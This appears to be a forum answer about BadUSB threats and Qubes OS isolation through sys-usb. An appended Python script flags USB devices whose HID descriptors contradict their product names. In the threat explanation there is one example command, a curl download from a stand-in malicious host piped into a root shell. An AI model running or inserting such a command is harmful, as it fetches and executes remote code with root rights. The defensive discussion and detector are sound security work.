badUSB & Qubes Questions

First, understand the threats:

  • USB device that pretends to be something other than what it visually looks like
  • USB device that tries to exploit known vulnerabilities in an operating system USB stack (which can include third-party USB drivers)

Realization (forget about Qubes right now):

  • A USB mouse that tells the OS it’s really a keyboard: the mouse can now send keystrokes, such as curl http://malicious.site/malware | sudo /bin/sh
  • A USB mouse that is a mouse, but it knows there’s a bug in the HID input driver that can lead to kernel mode code execution. From there that mouse essentially has full control over your computer.

Knowing that, the Qubes approach is to limit and isolate those interactions. dom0 is the most sacred in Qubes/Xen land, so the better we can prevent USB devices talking to the dom0, the better.

Those protections come in the form of:

  • Blocking USB (once Xen hands control to dom0 at bootup) while entering disk password
  • Limiting USB communication to an untrusted qube (sys-usb)
  • Using sys-usb and the Qubes device widget to attach specific USB interfaces to a qube

I notice you use phrases like “it’s not safe”, “you are safe until”, etc. You should answer “safe from what” first.

But the generic answer is:

  1. Limit what you plug into your computer
  2. Use the facilities Qubes provides you to attach USB devices to only the qubes needed
  3. When that doesn’t work, use a disposable sys-usb qube.

The Qubes ideology is the groundbreaking realization that all code has bugs and vulnerabilities. We will never know all of them, so let’s do as much as we can to stop most of them, have an easy way to recover from exploited bugs (disposable VMs, non-persistent root, etc.), yet still have a usable system.

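A defender-side check for the first threat in the post (a device whose interface descriptors disagree with what it claims to be), as an added example that is not code from the post or from the Qubes project. It reads the standard Linux sysfs layout (`/sys/bus/usb/devices`, assumed), so the natural place to run it is inside sys-usb, where the devices actually land; the sample records are constructed.

```python
# Added example, not code from the post or from Qubes: flags USB devices whose
# interface descriptors do not match what they claim to be (the "mouse that is
# really a keyboard" case above). Sample records at the bottom are constructed.
from pathlib import Path

HID_CLASS, BOOT_SUBCLASS = 0x03, 0x01     # HID class, boot-protocol subclass
PROTO_KEYBOARD, PROTO_MOUSE = 0x01, 0x02   # bInterfaceProtocol for boot HID devices
FIELDS = ("bInterfaceClass", "bInterfaceSubClass", "bInterfaceProtocol")

def iface(cls, sub, proto):
    """Build one interface record in the shape read_sysfs() produces."""
    return dict(zip(FIELDS, (cls, sub, proto)))

def read_sysfs(root="/sys/bus/usb/devices"):
    """Collect {device: {product, interfaces}} from a Linux sysfs tree (assumed standard layout)."""
    devices = {}
    for path in Path(root).glob("*"):
        dev = devices.setdefault(path.name.split(":")[0], {"product": "", "interfaces": []})
        if (path / "bInterfaceClass").exists():     # interface directory, e.g. 1-2:1.0
            dev["interfaces"].append(iface(*(int((path / f).read_text(), 16) for f in FIELDS)))
        elif (path / "product").exists():           # device directory, e.g. 1-2
            dev["product"] = (path / "product").read_text().strip()
    return devices

def boot_protocols(interfaces):
    """HID boot protocols (keyboard/mouse) a device advertises."""
    return {i["bInterfaceProtocol"] for i in interfaces
            if i["bInterfaceClass"] == HID_CLASS and i["bInterfaceSubClass"] == BOOT_SUBCLASS}

def suspicious(device):
    """Reasons to keep a device away from dom0 or a trusted qube; empty list if none."""
    reasons = []
    name = device.get("product", "").lower()
    if PROTO_KEYBOARD in boot_protocols(device["interfaces"]) and "keyboard" not in name:
        reasons.append("advertises a keyboard interface but is not described as one")
    classes = {i["bInterfaceClass"] for i in device["interfaces"]}
    if HID_CLASS in classes and len(classes) > 1:
        reasons.append("HID interface bundled with non-HID interfaces (composite device)")
    return reasons

# Constructed sample records, as read_sysfs() would return them
SAMPLES = {
    "honest_mouse": {"product": "USB Optical Mouse", "interfaces": [iface(3, 1, PROTO_MOUSE)]},
    "mouse_with_keyboard": {"product": "USB Optical Mouse",
                            "interfaces": [iface(3, 1, PROTO_MOUSE), iface(3, 1, PROTO_KEYBOARD)]},
    "storage_with_keyboard": {"product": "Flash Disk",
                              "interfaces": [iface(8, 6, 0x50), iface(3, 1, PROTO_KEYBOARD)]},
}
```

On a live host, `suspicious()` run over `read_sysfs()` lists every plugged-in device that merits a look before it is attached anywhere; legitimate composite devices (a keyboard with a built-in hub, a wireless receiver serving several peripherals) will also be flagged, which is exactly why the post's answer is isolation through sys-usb rather than trusting any descriptor check.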